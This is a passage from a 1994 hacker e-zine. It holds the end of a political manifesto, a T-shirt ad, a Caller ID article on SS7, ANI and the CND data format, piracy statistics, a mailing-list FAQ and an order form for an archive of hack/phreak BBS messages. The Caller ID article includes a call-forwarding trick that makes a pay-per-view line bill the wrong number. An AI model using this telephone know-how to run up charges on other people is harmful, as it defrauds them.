  4666. They have directly attacked innocent citizens in order to keep them from
  4667.         publicly assembling.
  4668. They have spied on and attempted to interfere with the private
  4669.         communications of innocent citizens.
  4670. They have made unreasonable and excessive searches and seizures.
  4671. They have punished innocent citizens without trial.
  4672. They have attempted to effect a chill on the free flow of thoughts and
  4673.         ideas.
  4674. They have affected to render the government independent of and superior to
  4675.  the people.
  4676.         We cannot, we WILL not, allow this tyranny to continue! The United
  4677. States Government has ignored the voice of the Electronic Community long
  4678. enough! When we told the government that what they were doing was wrong,
  4679. they refused to listen! When we formed political action groups to bring our
  4680. cases to court and before Congress, we were told that we were using
  4681. loopholes in the law to get away with crime!!! We have, in a peaceful and
  4682. respectful manner, given our government more than reasonable petition for
  4683. redress of our grievances, but if anything the situation has gotten worse!
  4684. Government administrations use computer crime as a weapon in internal
  4685. battles over jurisdiction. Government officials, who have only the
  4686. slightest understanding of computer science, use computer crime as a tool
  4687. for career success. Elected Representatives, who have absolutely no
  4688. understanding of computers, use "information superhighways", computer
  4689. crime, and cryptography to gain constituent money and voter support! The
  4690. Electronic Community, the only group who fully understands the issues
  4691. involved here, and the only group who is effected by the decisions being
  4692. made, has been completely ignored! We have sat around and discussed these
  4693. wrongs long enough! NOW IS THE TIME TO STAND UP AND DEMAND A REDRESS OF OUR
  4694. GRIEVANCES BY ANY AND ALL MEANS AVAILABLE! We must scream the truth so
  4695. loudly that we drown out everything else! We must save our small community
  4696. from destruction so that when the rest of society is ready, the world will
  4697. still have a forum for free speech and open communication. We must demand
  4698. freedom for America's Electronic Community!!!
  4699.  
  4700. Tom Cross AKA The White Ninja
  4701. TWN615@Phantom.Com
  4702.  
  4703. NOTE: Redistribution and further publishing of this document is highly
  4704. encouraged as long as proper credit is given.
  4705.  
  4706. -------------------------
  4707. -------------------------    "Government is not a reason, not an eloquence;
  4708. -------------------------    it is a force. Like fire, it is a dangerous
  4709. --------------- * * * * *    servant and a fearful master."
  4710. --------------- * * * * *
  4711. --------------- * * * * *                        -- George Washington
  4712. --------------- * * * * *
  4713.  
  4714. ------------------------------------------------------------------------------
  4715.  
  4716.   THE JOURNAL OF AMERICAN UNDERGROUND COMPUTING / Published Quarterly
  4717.   ========================================================================
  4718.   ISSN 1074-3111  Technology, Conspiracy, Editorials, Politics, Networking
  4719.   ========================================================================
  4720.  
  4721.       Editor-in-Chief:         Scott Davis
  4722.       NetSurfer:               John Logan
  4723.       It's A Conspiracy!:      Gordon Fagan
  4724.  
  4725.       E-Mail - editors@fennec.com
  4726.       ** ftp site: etext.archive.umich.edu    /pub/Zines/JAUC
  4727.  
  4728.       U.S. Mail:
  4729.       The Journal Of American Underground Computing
  4730.       10111 N. Lamar #25
  4731.       Austin, Texas 78753
  4732.  
  4733.   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  4734.  
  4735.   To Subscribe to "TJOAUC", send mail to:              sub@fennec.com
  4736.   All questions/comments about this publication to:    comments@fennec.com
  4737.   Send all articles/info that you want published to:   submit@fennec.com
  4738.   Commercial Registration for Profitable Media:        form1@fennec.com
  4739.  
  4740.  "The underground press serves as the only effective counter to a growing
  4741.  power, and more sophisticated techniques used by establishment mass media
  4742.  to falsify, misrepresent, misquote, rule out of consideration as a priori
  4743.  ridiculous, or simply ignore and blot out of existence: data, books,
  4744.  discoveries that they consider prejudicial to establishment interest..."
  4745.  
  4746.  (William S. Burroughs and Daniel Odier, "The Job", Viking, New York, 1989)
  4747.  
  4748. ------------------------------------------------------------------------------
  4749.  
  4750.    New TimeWasters T-shirts !
  4751.  
  4752. Do you know the feeling ? You're behind your terminal for hours,
  4753. browsing the directories of your school's UNIX system. Instead of
  4754. holes, bugs and bad file permissions you find tripwire, TCPwrapper and
  4755. s/key. You run a file with a s-bit and immediately you get a mail from
  4756. the system admin asking what you are doing. In other words, no chance
  4757. to ever become a good hacker there.
  4758.  
  4759. Now you have the chance to at least pretend to be an eleet
  4760. hacker. The Dutch hacking fanatics The TimeWasters have released
  4761. the third version of their cool 'hacker' T-shirt. Because
  4762. the previous versions were too limited (20 and 25 shirts) we
  4763. printed no less than 200 shirts this time.
  4764.  
  4765. Of course you want to know, what does it look like ?
  4766. On the front, a TimeWasters logo in color. Below that a picture
  4767. of two hacking dudes, hanging behind their equipment, also
  4768. featuring a stack of phracks, pizza boxes, beer, kodez, and
  4769. various computer-related stuff with a 'No WsWietse' sticker.
  4770. On the back, the original TimeWasters logo with the broken
  4771. clock. Below it, four original and dead funny real quotes
  4772. featuring the art of Time Wasting.
  4773.  
  4774. Wearing this shirt can only provoke one reaction; WOW !
  4775. Imagine going up to the helpdesk wearing this shirt and
  4776. keeping a straight face while asking a security question !
  4777.  
  4778. And for just $2 more you'll get a pair of sunglasses with
  4779. the text 'TimeWasters' on them !
  4780.  
  4781. To order:
  4782. Send $20 or $22 to
  4783.  TimeWasters
  4784.  Postbus 402
  4785.  5611 AK Eindhoven
  4786.  The Netherlands, Europe
  4787. This includes shipping. Please allow some time for delivery. If you
  4788. are in Holland, don't send US$, email the address below for the
  4789. price in guilders and our 'postbank' number.
  4790.  
  4791. For more information: email to:
  4792. - timewasters-request@win.tue.nl with subject: T-SHIRT for a txtfile
  4793.   with more info.
  4794. - rob@hacktic.nl or gigawalt@win.tue.nl for questions.
  4795.  
  4796. Written by Rob J. Nauta, rob@hacktic.nl dd. 8 mar 1994
  4797.  
  4798. ------------------------------------------------------------------------------
  4799.  
  4800. Caller ID Technical Details
  4801. by Hyperborean Menace
  4802.  
  4803. The way Caller ID works internally is through SS7 (Signalling System 7)
  4804. messages between telephone switches equipped to handle SS7.  These messages
  4805. pass all the call information (block/no block, calling number, etc.).
  4806. The calling number is sent as part of the SS7 call setup data on all SS7
  4807. routed calls (i.e. all calls carried between switches that are SS7
  4808. connected).
  4809.  
  4810. The calling number is sent between switches always, regardless of
  4811. whether or not *67 (Caller ID Block) is dialed.  It just sends along a
  4812. privacy indicator if you dial *67, and then the final switch in the path
  4813. will send a "P" instead of the calling number to the Caller ID box.
  4814. (But it will still store the actual number - *69 will work whether or
  4815. not the caller dialed *67).  What the final switch along the path does
  4816. with the calling number depends on how the switch is configured.  If you
  4817. are not paying for Caller ID service, the switch is configured so that
  4818. it will not transmit the Caller ID data.
  4819.  
  4820. This is entirely separate from Automatic Number Identification, which is sent
  4821. along SS7 where SS7 is available, but can also be sent using other methods,
  4822. so that ALL switches (for many years now) have been able to send ANI (which
  4823. is what Long Distance companies used to know who to bill).  Enhanced 911 is
  4824. NOT based on Caller ID, but on ANI, thus, it will work for anyone, not just
  4825. people connected to SS7 capable switches.  And, of course, *67 will have no
  4826. effect on Enhanced 911 either.
  4827.  
  4828. Also interesting is the effect call forwarding has on the various services.
  4829. Say I have my home telephone forwarded to Lunatic Labs, and it has
  4830. Caller ID.  If you call me, the call will forward to Lunatic Labs, and
  4831. its Caller ID box will show YOUR number, not mine (since your line is
  4832. the actual one making the call).
  4833.  
  4834. However, ANI is based on the Billing Number (who is paying for the call (or
  4835. would pay if it weren't free), not on who is actually making the call.
  4836. Thus, if I forward my telephone to an 800 Number that gets ANI (such as the
  4837. cable pay-per-view order number), and you call me, they will get MY number
  4838. (since I would be the one paying for that portion of the call, except that
  4839. 800 Numbers are free), and you will end up ordering pay-per-view for
  4840. me...
  4841.  
  4842.  
  4843. CNID (Caller ID) Technical Specifications
  4844.  
  4845.  
  4846.  PARAMETERS
  4847.  The data signalling interface has the following characteristics:
  4848.         Link Type:           2-wire, simplex
  4849.         Transmission Scheme:    Analog, phase-coherent FSK
  4850.         Logical 1 (mark)        1200 +/- 12 Hz
  4851.         Logical 0 (space)       2200 +/- 22 Hz
  4852.         Transmission Rate:         1200 bps
  4853.         Transmission Level:        13.5 +/- dBm into 900 ohm load
  4854.  
  4855.  (I have copied this data as presented.  I believe the
  4856.  transmission level is meant to be -13.5 dBm.)
  4857.  
  4858.  [It is indeed -13.5 dBm]
  4859.  
  4860.  PROTOCOL
  4861.  The protocol uses 8-bit data words (bytes), each bounded by a
  4862.  start bit and a stop bit.  The CND message uses the Single Data
  4863.  Message format shown below.
  4864.  
  4865.  [ I belive this is the same as standard asynchronous serial - I think the
  4866.  start bit is a "space", and the stop bit is a "mark" ]
  4867.  
  4868.  Channel  Carrier  Message  Message  Data     Checksum
  4869.  Seizure  Signal   Type     Length   Word(s)  Word
  4870.  Signal            Word     Word
  4871.  
  4872.  CHANNEL SEIZURE SIGNAL
  4873.  The channel seizure is 30 continuous bytes of 55h (01010101)
  4874.  providing a detectable alternating function to the CPE (i.e. the
  4875.  modem data pump).
  4876.  
  4877.  [CPE = Customer Premises Equipment --i.e. your Caller ID Box]
  4878.  
  4879.  CARRIER SIGNAL
  4880.  The carrier signal consists of 130 +/- 25 mS of mark (1200 Hz) to
  4881.  condition the receiver for data.
  4882.  
  4883.  MESSAGE TYPE WORD
  4884.  The message type word indicates the service and capability
  4885.  associated with the data message.  The message type word for CND
  4886.  is 04h (00000100).
  4887.  
  4888.  MESSAGE LENGTH WORD
  4889.  The message length word specifies the total number of data words
  4890.  to follow.
  4891.  
  4892.  DATA WORDS
  4893.  The data words are encoded in ASCII and represent the following
  4894.  information:
  4895.  
  4896.  o  The first two words represent the month
  4897.  o  The next two words represent the day of the month
  4898.  o  The next two words represent the hour in local military time
  4899.  o  The next two words represent the minute after the hour
  4900.  o  The calling party's directory number is represented by the
  4901.         remaining  words in the data word field
  4902.  
  4903.  If the calling party's directory number is not available to the
  4904.  terminating central office, the data word field contains an ASCII
  4905.  "O".  If the calling party invokes the privacy capability, the
  4906.  data word field contains an ASCII "P".
  4907.  
  4908.  [ Note that 'O' will generally result in the Caller-ID box displaying
  4909.  "Out Of Area" indicating that somewhere along the path the call took from
  4910.  its source to its destination, there was a connection that did not pass
  4911.  the Caller ID data.  Generally, anything out of Southwestern Bell's area
  4912.  will certainly generate a 'O', and some areas in SWB territory might also
  4913.  not have the SS7 connections required for Caller ID]
  4914.  
  4915.  CHECKSUM WORD
  4916.  The Checksum Word contains the twos complement of the modulo 256
  4917.  sum of the other words in the data message (i.e., message type,
  4918.  message length, and data words).  The receiving equipment may
  4919.  calculate the modulo 256 sum of the received words and add this
  4920.  sum to the received checksum word.  A result of zero generally
  4921.  indicates that the message was correctly received.  Message
  4922.  retransmission is not supported.
  4923.  
  4924.  EXAMPLE CND SINGLE DATA MESSAGE
  4925.  An example of a received CND message, beginning with the message
  4926.  type word, follows:
  4927.  
  4928.  04 12 30 39 33 30 31 32 32 34 36 30 39 35 35 35 31 32 31 32 51
  4929.  
  4930.  04h=  Calling number delivery information code (message type word)
  4931.  12h= 18 decimal; Number of data words (date, time, and directory
  4932.         number words)
  4933.  ASCII 30,39= 09; September
  4934.  ASCII 33,30= 30; 30th day
  4935.  ASCII 31,32= 12; 12:00 PM
  4936.  ASCII 32,34= 24; 24 minutes (i.e., 12:24 PM)
  4937.  ASCII 36,30,39,35,35,35,31,32,31,32= (609) 555-1212; calling
  4938.                           party's directory number
  4939.  51h=  Checksum Word
  4940.  
  4941.  [ There is also a Caller Name service that will transmit the number and the
  4942.  name of the caller.  The basic specs are the same as just numbers, but more
  4943.  data is transmitted.  I don't have the details of the data stream for that.]
  4944.  
  4945.  DATA ACCESS ARRANGEMENT (DAA) REQUIREMENTS
  4946.  To receive CND information, the modem monitors the phone line
  4947.  between the first and second ring bursts without causing the DAA
  4948.  to go off hook in the conventional sense, which would inhibit the
  4949.  transmission of CND by the local central office.  A simple
  4950.  modification to an existing DAA circuit easily accomplishes the
  4951.  task.
  4952.  
  4953.  [i.e. The Caller-ID Device should present a high impedance to the line]
  4954.  
  4955.  MODEM REQUIREMENTS
  4956.  Although the data signalling interface parameters match those of
  4957.  a Bell 202 modem, the receiving CPE need not be a Bell 202
  4958.  modem.  A V.23 1200 bps modem receiver may be used to demodulate
  4959.  the Bell 202 signal.  The ring indicate bit (RI) may be used on a
  4960.  modem to indicate when to monitor the phone line for CND
  4961.  information.  After the RI bit sets, indicating the first ring
  4962.  burst, the host waits for the RI bit to reset.  The host then
  4963.  configures the modem to monitor the phone line for CND
  4964.  information.
  4965.  
  4966.  According to Bellcore specifications, CND signalling starts as
  4967.  early as 300 mS after the first ring burst and ends at least 475
  4968.  mS before the second ring burst.
  4969.  
  4970.  
  4971.  
  4972. ------------------------------------------------------------------------------
  4973.  
  4974. Country               Percentage of Piracy
  4975. --------------------------------------------------------
  4976. Australia / New Zealand   45%
  4977. Benelux                   66
  4978. France                    73
  4979. Germany                   62
  4980. Italy                     86
  4981. Japan                     92
  4982. Korea                     82
  4983. Singapore                 41
  4984. Spain                     86
  4985. Sweden                    60
  4986. Taiwan ( 1990 )           93
  4987. Thailand                  99
  4988. United Kingdom            54
  4989. United States             35
  4990.  
  4991.      Source: Business Software Alliance, based on 1992 h/w & s/w
  4992.                     shipping figures
  4993.  
  4994. ------------------------------------------------------------------------------
  4995.  
  4996. The Frog Farm Mailing List FAQ v1.1
  4997. January 20th, 1994
  4998.  
  4999.  
  5000. 1. What is this I am reading?
  5001. 2. What is the Frog Farm?
  5002. 3. Okay, so what's the Frog Farm mailing list?
  5003. 4. Are there any rules enforced on the mailing list?
  5004. 5. I can see all the addresses of the subscribers!
  5005. 6. You must be Nazis. After all, aren't people who hate Jews,
  5006.  blacks, etc., the only people who talk about this sort of thing?
  5007.  
  5008. 1. What is this I am reading?
  5009.  
  5010. This is the FAQ for the Frog Farm mailing list. It is NOT the FAQ
  5011. for the Frog Farm. The FAQ for the Frog Farm is much larger (just
  5012. over 100 Kbytes in size).
  5013.  
  5014.  
  5015. 2. What is the Frog Farm?
  5016.  
  5017. Read the FAQ. You can FTP it from etext.archive.umich.edu in the
  5018. /pub/Legal/FrogFarm directory (also accessible via Gopher). If
  5019. you do not have FTP access, you may request the FAQ via e-mail
  5020. from schirado@lab.cc.wmich.edu.
  5021.  
  5022.  
  5023. 3. Okay, so what's the Frog Farm mailing list?
  5024.  
  5025. frog-farm@blizzard.lcs.mit.edu is an unmoderated e-mail forum
  5026. devoted to the discussion of claiming, exercising and defending
  5027. Rights in America, past, present and future. Topics include, but
  5028. are not limited to, conflicts which can arise between a free
  5029. people and their public servants when said servants exceed the
  5030. scope of their powers, and possible methods of dealing with such
  5031. conflicts.
  5032.  
  5033. To subscribe to the list, send a message containing the single
  5034. line:
  5035.  
  5036.   ADD <your-preferred-email-addr>
  5037.  
  5038. to frog-farm-request@blizzard.lcs.mit.edu.
  5039.  
  5040. To remove your subscription from the forum, send a message
  5041. containing the single line:
  5042.  
  5043.   REMOVE <same-email-addr-as-above>
  5044.  
  5045. to frog-farm-request@blizzard.lcs.mit.edu.
  5046.  
  5047. Note that these commands must be in the BODY of the message; the
  5048. contents of the Subject line are ignored.
  5049.  
  5050. While you are subscribed, send mail to
  5051.  
  5052. frog-farm@blizzard.lcs.mit.edu
  5053.  
  5054. to echo your message to all other list subscribers.
  5055.  
  5056.  
  5057. 4. Are there any rules enforced on the mailing list?
  5058.  
  5059. Only two:
  5060.  
  5061. 1) Do not reveal the e-mail addresses of any subscribers to any
  5062.    individuals who are not subscribers. You may freely
  5063.    redistribute any article posted to the Frog Farm, subject to
  5064.    whatever conditions the poster may have placed on it. For
  5065.    example, some people attach a notice to their message stating
  5066.    that they are NOT allowing the redistribution of their message
  5067.    under ANY circumstances, some people stipulate that it may be
  5068.    redistributed only if it is unaltered in any way, etc.
  5069.  
  5070. 2) No flaming is permitted. The list maintainers are the sole
  5071.    judges of what constitutes flaming.
  5072.  
  5073.  
  5074. 5. I can see all the addresses of the subscribers!
  5075.  
  5076. Under normal circumstances, you can't see the names. If you can,
  5077. you had to work at it; if so, you obviously know what you're
  5078. doing, and you should have known better. Try not to let your
  5079. curiosity overwhelm your respect for the privacy of others.
  5080.  
  5081. The security on this list is not as tight as it could be,
  5082. and it is a trivial process for a knowledgeable hacker or hackers
  5083. to circumvent it. If you know how to do this, please don't do it.
  5084.  
  5085.  
  5086.  
  5087. 6. You must be Nazis. After all, aren't people who hate Jews,
  5088.  blacks, etc., the only people who talk about this sort of thing?
  5089.  
  5090. Not at all. The official position of the Frog Farm is that every
  5091. human being, of any sex or race, has "certain inalienable Rights"
  5092. which may not be violated for any cause or reason. Anyone may
  5093. claim and exercise Rights in America, providing they possess the
  5094. necessary courage and mental competence.
  5095.  
  5096. The Frog Farm provides a List of Interesting Organizations to its
  5097. subscribers, which may include organizations or persons who
  5098. believe in a god or gods, or promote the idea that certain races
  5099. are inferior or perhaps part of a conspiratorial plot to enslave
  5100. everyone else. The list maintainers make every effort to note
  5101. such idiotic beliefs, where they exist, and encourage people not
  5102. to throw out the baby with the bathwater, but to seek the truth
  5103. wherever it may be found.
  5104.  
  5105. Every individual is unique, and none may be judged by anything
  5106. other than their words and actions.
  5107.  
  5108. ------------------------------------------------------------------------------
  5109.  
  5110.       The LOD Communications Underground H/P BBS Message Base Project:
  5111.  
  5112.                    Information/Order File: Brief Version
  5113.                                  2/17/94
  5114.  
  5115.  
  5116.    This is a short version of the longer, 35K (12 page) Order/Info file. If
  5117. you want the full file, sample message file, detailed tables of contents file,
  5118. etc. you can request it from lodcom@mindvox.phantom.com or choose menu item
  5119. #5 on the Mindvox Gopher Server by using any gopher and opening a connection
  5120. with the hostname: mindvox.
  5121.  
  5122.  
  5123. The Project:
  5124. ------------
  5125.  
  5126.    Throughout history, physical objects have been preserved for posterity for
  5127. the benefit of the next generation of humans.  Cyberspace, however, isn't very
  5128. physical; data contained on floppy diskettes has a finite lifetime as does the
  5129. technology to retrieve that data.  The earliest underground hacker bulletin
  5130. board systems operated at a time when TRS-80s, Commodore 64s, and Apple ][s
  5131. were state-of-the-art.  Today, it is difficult to find anyone who has one of
  5132. these machines in operating condition, not to mention the brain cells left to
  5133. recall how to operate them. :-(
  5134.  
  5135.    LOD Communications has created a historical library of the "dark" portion
  5136. of Cyberspace.  The project's goal is to acquire as much information as
  5137. possible from underground Hack/Phreak (H/P) bulletin boards that were in
  5138. operation during a decade long period, dating from the beginnings (in 1980/81
  5139. with 8BBS and MOM:  Modem Over Manhattan) to the legendary OSUNY, Plover-NET,
  5140. Legion of Doom!, Metal Shop, etc. up through the Phoenix Project circa
  5141. 1989/90. Currently, messages from over 75 different BBSes have been retrieved,
  5142. although very few message bases are 100% complete.  However, not having a
  5143. complete "set" does not diminish their value.
  5144.  
  5145.   DONATIONS: A portion of every order will be donated to the following causes:
  5146.  
  5147.              1) A donation will be made to help pay for Craig Neidorf's
  5148.                 (Knight Lightning - Metal Shop Private Co-Sysop) Legal Defense
  5149.                 bills (resulting from his successful campaign to protect First
  5150.                 Amendment rights for electronic publishing, i.e. the
  5151.                 PHRACK/E911 case).
  5152.  
  5153.              2) The SotMESC Scholarship Fund.  The SotMESC Scholarship is
  5154.                 awarded to students writing exceptional papers of 20 to 30
  5155.                 pages on a topic based on computer culture (ie, hacking
  5156.                 culture, virus writing culture, Internet culture, etc.) For
  5157.                 more details write: SotMESC  PO BOX 573  Long Beach, MS 39560
  5158.                 or email: rejones@seabass.st.usm.edu
  5159.  
  5160.     NOTE: THE FIRST DONATIONS TO EACH OF THE ABOVE TWO CAUSES HAVE ALREADY
  5161.           BEEN MADE.
  5162.  
  5163. What Each "Message Base File" Contains:
  5164. ---------------------------------------
  5165.  
  5166.      - A two page general message explaining H/P BBS terminology and format.
  5167.  
  5168.      - The BBS Pro-Phile:  A historical background and description of the BBS
  5169.        either written by the original system operator(s) or those who actually
  5170.        called the BBS when it was in operation (it took months to track the
  5171.        appropriate people down and get them to write these specifically for
  5172.        this project; lesser known BBSes may not contain a Pro-Phile);
  5173.  
  5174.      - Messages posted to the BBS (i.e. the Message Base);
  5175.  
  5176.      - Downloaded Userlists if available; and
  5177.  
  5178.      - Hacking tutorials a.k.a. "G-Philes" that were on-line if available.
  5179.  
  5180.    It is anticipated that most people who are interested in the message bases
  5181. have never heard of a lot of the BBS names shown in the listing.  If you have
  5182. seen one set of messages, you have NOT seen them ALL.  Each system had a
  5183. unique personality, set of users, and each has something different to offer.
  5184.  
  5185.  
  5186. Formats the Message Base Files are Available in:
  5187. ------------------------------------------------
  5188.  
  5189.    Due to the large size of the Message Base Files, they will be compressed
  5190. using the format of your choice.  Please note that Lodcom does NOT include the
  5191. compression/uncompression program (PKZIP, PAK, MAC Stuffit, etc.).  ASCII
  5192. (uncompressed) files will be provided for $5.00 extra to cover additional
  5193. diskette (files that are uncompressed require more than double the number of
  5194. diskettes) and shipping costs.  The files are available for:
  5195.  
  5196.      - IBM (5.25 or 3.5 inch)
  5197.      - APPLE MACINTOSH (3.5 inch)
  5198.      - ATARI ST (MS-DOS Compatible 3.5 inch)
  5199.      - AMIGA (3.5 inch)
  5200.      - PAPER versions can be ordered but cost triple (due to increased costs
  5201.        to ship, time to print, and messages being in 40 column format which
  5202.        wastes lots of paper...save those trees!).  Paper versions take twice
  5203.        the time to deliver but are laser printed.
  5204.  
  5205. Orders are expected to arrive at the requesters' physical mail box in 3-5
  5206. weeks upon receipt of the order.
  5207.  
  5208.  
  5209. The Collection:
  5210. ---------------
  5211.  
  5212.    This is where we currently stand as far as what has been completed and the
  5213. estimated completion dates for the rest of the project:
  5214.  
  5215.                        Volume 1: 5700+ Messages, 20 H/P BBSes, COMPLETED.
  5216.                        Volume 2: 2100+ Messages, 25 H/P BBSes, COMPLETED.
  5217.                        Volume 3: 20-30 H/P BBSes, End of March 1994.
  5218.                        Volume 4: ????? H/P BBSes, Sometime after 3/94.
  5219.                        All in all there is expected to be 12000+ Messages.
  5220.  
  5221.        NOTE: Additional material has recently been received for Boards already
  5222. released in the first 2 volumes. Those who have already ordered will receive
  5223. the updated versions with the additional messages that have been recovered.
  5224.  
  5225.  
  5226. *** Blurbs and Excerpts: ***
  5227. ----------------------------
  5228.  
  5229.     Blurbs from some of those who have received the first two Volumes:
  5230.  
  5231.    "I am stunned at the quality of this undertaking. It brought back that
  5232.     feeling of involvement and interest." --P.P.
  5233.  
  5234.    "I think of the release of the H/P Message Bases as an opening salvo in
  5235.     the battle for the truth about fraud in the Telecom Industry." --J.J.
  5236.  
  5237.    "Still sifting through Volume one. For now I've taken the approach of
  5238.     putting all the files into one subdirectory and searching it for topics
  5239.     of interest. Prime and Primos computers was my first topic of interest
  5240.     and Volume I yielded quite a bit of odd and useful information." --K.B.
  5241.  
  5242.    "...the professionalism of the Message Bases is of a superior quality.
  5243.     Somehow they bring back that age of innocence. Boy do I miss those
  5244.     times." --A.C.
  5245.  
  5246.    Excerpt from 2600 Magazine (The Hacker Quarterly) Autumn 1993 Issue,
  5247. review by Emmanuel Goldstein entitled NEVER ERASE THE PAST.
  5248.  
  5249.     "...is this the sort of thing that people really care about? Undoubtedly,
  5250. many will shrug it off as useless, boring teenagers that have absolutely no
  5251. relevance to anything in the real world. The fact remains, however, that this
  5252. is history. This is *our* history, or at least, a small part of it. The boards
  5253. included in this project - Sherwood Forest I & II, Metal Shop Private, OSUNY,
  5254. Phoenix Project, and a host of others - are among the more interesting hacker
  5255. boards, with some classic dialogue and a gang of hacker stars-to-be. Nearly
  5256. all of these boards were raided at one time or another, which makes it all
  5257. even more fascinating."
  5258.  
  5259.     "Had the LODCOM project not come along when it did, a great many of these
  5260. message bases probably would have been lost forever. Providing this service
  5261. to both the hacker community and those interested in it is a noble cause that
  5262. is well worth the price. If it succeeds, some valuable hacker data will be
  5263. preserved for future generations."
  5264.  
  5265.     The Lodcom project was also reviewed in Computer underground Digest Issue
  5266. #5.39 and will be reviewed by GRAY AREAS MAGAZINE in their summer issue. You
  5267. should be able to find the issue on most newsstands in about 3 months. You can
  5268. contact Gray Areas by phone: 215-353-8238 (A machine screens their calls), by
  5269. email: grayarea@well.sf.ca.us, and by regular mail: Gray Areas, Inc. , PO BOX
  5270. 808, Broomall, PA 19008-0808. Subscriptions are $18.00 a year U.S. and we
  5271. highly recommend the magazine if you are interested in the gray areas of life.
  5272.  
  5273. *** {End of Blurbs and Excerpts} ***
  5274.  
  5275.  
  5276. Volume 1 & 2 Table of Contents:
  5277. -------------------------------
  5278.  
  5279.      A detailed Table of Contents file can be found on the Mindvox Gopher
  5280. Server or requested via email.
  5281.  
  5282.  
  5283. Project Contributor List:
  5284. -------------------------
  5285.  
  5286.    The following is a list (order is random) of those who helped with this
  5287. effort that began in Jan. of 1993. Whether they donated material, uploaded
  5288. messages, typed messages from printouts, critiqued our various materials,
  5289. wrote BBS Pro-Philes, donated services or equipment, or merely 'looked in
  5290. their attic for some old disks', their help is appreciated:
  5291.  
  5292. Lord Digital and Dead Lord (Phantom Access Technologies/The MINDVOX System),
  5293. 2600 Magazine/Emmanuel Goldstein, The Marauder, Knight Lightning, T.B.,
  5294. Computer underground Digest (CuD)/Jim Thomas/Gordon Meyer, Phrack Magazine,
  5295. Strat, Jester Sluggo, Erik Bloodaxe, Taran King, Professor Falken, TUC,
  5296. Lex Luthor, Mark Tabas, Phantom Phreaker, Quasi Moto, The Mechanic, Al Capone,
  5297. Compu-Phreak, Dr. Nibblemaster, King Blotto, Randy Hoops, Sir Francis Drake,
  5298. Digital Logic, The Ronz, Doctor Who, The Jinx, Boca Bandit, Crimson Death,
  5299. Doc Holiday, The Butler, Ninja Master, Silver Spy, Power Spike, Karl Marx,
  5300. Blue Archer, Dean Simmons, Control-C, Bad Subscript, Swamp Ratte, Randy Smith,
  5301. Terminal Man, SK Erickson, Slave Driver, R.E.Jones/CSP/SotMESC, Gray Areas
  5302. Magazine, and anonymous others.
  5303.  
  5304.  
  5305. The Order Form:
  5306. ---------------
  5307.  
  5308. - - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -
  5309.  
  5310.                LOD Communications H/P BBS Message Base ORDER FORM
  5311.                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5312.  
  5313.    PERSONAL RATE:  Volumes 1, 2, 3, and possibly a fourth if created: $39.00
  5314.    This price is TOTAL & includes any updates to individual BBS Message Bases.
  5315.  
  5316.    COMMERCIAL RATE:  Corporations, Universities, Libraries, and Government
  5317.    Agencies: $99.00  As above, price is total and includes updates.
  5318.  
  5319. H/P BBS Message Bases (All Volumes): $________
  5320.  
  5321. "G-Phile" Collection (Optional): $____________ ($10.00 Personal)
  5322.                                                ($25.00 Commercial)
  5323.  
  5324. Disk Format/Type of Computer: _____________________________________
  5325. (Please be sure to specify diskette size [5.25" or 3.5"] and high/low density)
  5326.  
  5327. File Archive Method (.ZIP [preferred], .ARJ, .LHZ, .Z, .TAR) ____________
  5328.                     (ASCII [Non-Compressed] add $5.00 to order)
  5329.  
  5330. Texas Residents add 8% Sales Tax.
  5331. If outside North America please add $6.00 for Shipping & Handling.
  5332.  
  5333. Total Amount (In U.S. Dollars): $ ___________
  5334.  
  5335. Payment Method:  Check or Money Order please, made out to LOD Communications.
  5336. Absolutely NO Credit Cards, even if it's yours :-)
  5337.  
  5338. By purchasing these works, the Purchaser agrees to abide by all applicable U.S.
  5339. Copyright Laws to not distribute or reproduce, electronically or otherwise, in
  5340. part or in whole, any part of the Work(s) without express written permission
  5341. from LOD Communications.
  5342.  
  5343. Send To:
  5344.           Name: _____________________________________
  5345.  
  5346.   Organization: _____________________________________ (If applicable)
  5347.  
  5348.         Street: _____________________________________
  5349.  
  5350. City/State/Zip: _____________________________________
  5351.  
  5352.        Country: _____________________________________
  5353.  
  5354. E-mail address: _____________________________________ (If applicable)
  5355.  
  5356.  
  5357. PRIVACY NOTICE:  The information provided to LOD Communications is used for
  5358. sending orders and periodic updates to the H/P BBS Message Base Price List.
  5359. It will NOT be given or sold to any other party.  Period.
  5360.  
  5361.  
  5362. - - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -
  5363.  
  5364. Remit To:   LOD Communications
  5365.             603 W. 13th
  5366.             Suite 1A-278
  5367.             Austin, Texas USA  78701
  5368.  
  5369. Lodcom can also be contacted via E-mail:  lodcom@mindvox.phantom.com
  5370.                              Voice Mail:  512-448-5098
  5371.  _____________________________________________________________________________
  5372.  End Brief Version of Order/Info File (2/20/94)
  5373.  
  5374.  
  5375. Email: lodcom@mindvox.phantom.com
  5376. Voice Mail: 512-448-5098
  5377. Snail Mail: LOD Communications
  5378.             603 W. 13th  Suite 1A-278
  5379.             Austin, Texas USA 78701
  5380.  
  5381. ------------------------------------------------------------------------------
  5382.  
  5383.  
  5384.  
  5385.                            BooX for Hackers
  5386.                            ================
  5387.  
  5388. by Seven Up
  5389.  
  5390. Usually I am not reading too many books. But there are two rather new
  5391. ones everyone should read and have.
  5392.  
  5393. UNIX Power Tools
  5394. ================
  5395.  
  5396. The first one is made for people who like to play with UNIX.
  5397. It is called 'UNIX Power Tools', published by Bantam and O'Reilly. It
  5398. contains over 1000 pages and weighs about 3 pounds, but contains a CD
  5399. ROM. It contains pretty useful information and examples on how to use
  5400. standard UNIX utilities and how to solve certain tasks. Some of the topics
  5401. it covers are:
  5402. Encryption of passwords, shell programming, config files for logging in
  5403. and out, setting shell prompts, vi tips & tricks, redirecting and piping,
  5404. sed & awk and much more. Like most O'Reilly books, it is written with
  5405. a lot of humor and easy to read. To me, this book is a reference for almost
  5406. any question. You might even feel that you don't need most of your old
  5407. UNIX books anymore, because this book almost covers it all. It is also a lot
  5408. of fun just to browse through the book randomly and read articles on
  5409. different subjects. There really is no need and no use to read it from A to Z.
  5410. A lot of their tricks is collected from Usenet Newsgroups. All of their use-
  5411. ful programs, scripts and general PD programs you will find on FTP sites
  5412. are on the CD. However, if you want a different medium they charge you $40.
  5413. And now we come to the only problem of the book: the price! I think compared
  5414. to the contents, charging $59.95 is justified; but it might scare off many
